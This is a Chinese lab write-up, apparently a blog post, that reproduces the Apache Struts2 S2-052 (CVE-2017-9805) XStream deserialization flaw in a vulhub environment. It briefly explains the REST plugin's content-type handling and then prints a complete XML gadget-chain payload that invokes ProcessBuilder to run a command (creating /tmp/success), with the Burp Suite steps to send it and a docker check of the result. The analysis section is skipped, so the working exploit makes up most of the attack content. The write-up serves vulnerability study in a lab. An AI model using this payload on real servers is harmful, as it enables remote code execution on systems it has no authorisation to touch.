C/C++教程
CVE-2017-9805 S2-052复现
0X00-引言
吉吉吉吉呗呗,吉吉吉吉呗呗
0X01-环境搭建
靶机:CentOS Linux 7
攻击机:windows server 2016 && Kail
环境:vulhub
工具:burpsuite
项目地址:https://github.com/vulhub/vulhub
搭建vulhub请访问:空白centos7 64 搭建vulhub(详细)
0X02-漏洞描述
Struts2-Rest-Plugin是让Struts2能够实现Restful API的一个插件,其根据Content-Type或URI扩展名来判断用户传入的数据包类型,有如下映射表:
| 扩展名 | Content-Type | 解析方法 |
|---|---|---|
| xml | application/xml | xstream |
| json | application/json | jsonlib或jackson(可选) |
| xhtml | application/xhtml+xml | 无 |
| 无 | application/x-www-form-urlencoded | 无 |
| 无 | multipart/form-data | 无 |
jsonlib无法引入任意对象,而xstream在默认情况下是可以引入任意对象的(针对1.5.x以前的版本),方法就是直接通过xml的tag name指定需要实例化的类名:
<classname></classname> //或者 <paramname class="classname"></paramname>
所以,我们可以通过反序列化引入任意类造成远程命令执行漏洞,只需要找到一个在Struts2库中适用的gedget。
影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12
0X03-漏洞复现
启动环境后,访问http://your-ip:8080/orders.xhtml即可看到showcase页面。由于rest-plugin会根据URI扩展名或Content-Type来判断解析方法,所以我们只需要修改orders.xhtml为orders.xml或修改Content-Type头为application/xml,即可在Body中传递XML数据。
http://192.168.234.128:8080/orders
01-创建/tmp/success
POC:
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>touch</string>
<string>/tmp/success</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
点击edit,进入页面,burp抓包-发送到repeater
修改-发送-回显500,但是成功
进入docker查看-成功
docker-compose exec struts2 ls /tmp/
0X04-漏洞分析
略
0X05-参考
S2-052 远程代码执行漏洞
Apache Struts2--052远程代码执行漏洞复现
-
uniAPP 实现全屏左右滚动滚动的效果-icode9专业技术文章分享06-30
-
如何在本地使用授权或插件-icode9专业技术文章分享06-30
-
伪静态规则配置方法汇总-icode9专业技术文章分享06-30
-
易优CMS安装常见问题汇总-icode9专业技术文章分享06-29
-
易优新手必读安装教程-icode9专业技术文章分享06-28
-
忘记eyoucms后台密码怎么办?-icode9专业技术文章分享06-28
-
终极指南:Scrum中如何设置需求优先级06-26
-
AI大模型企业应用实战(25)-为Langchain Agent添加记忆功能06-26
-
小白家庭 nas 搭建方案-icode9专业技术文章分享06-26
-
AI大模型企业应用实战(14)-langchain的Embedding06-23
-
AI大模型企业应用实战(15)-langchain核心组件06-23
-
AI大模型企业应用实战(16)-langchain核心组件06-23
-
AI 大模型企业应用实战(06)-初识LangChain06-23
-
EntBot.ai: AI Website Chatbot for Product Guides and Development Doc06-19
-
zero-shot-learning-definition-examples-comparison06-17
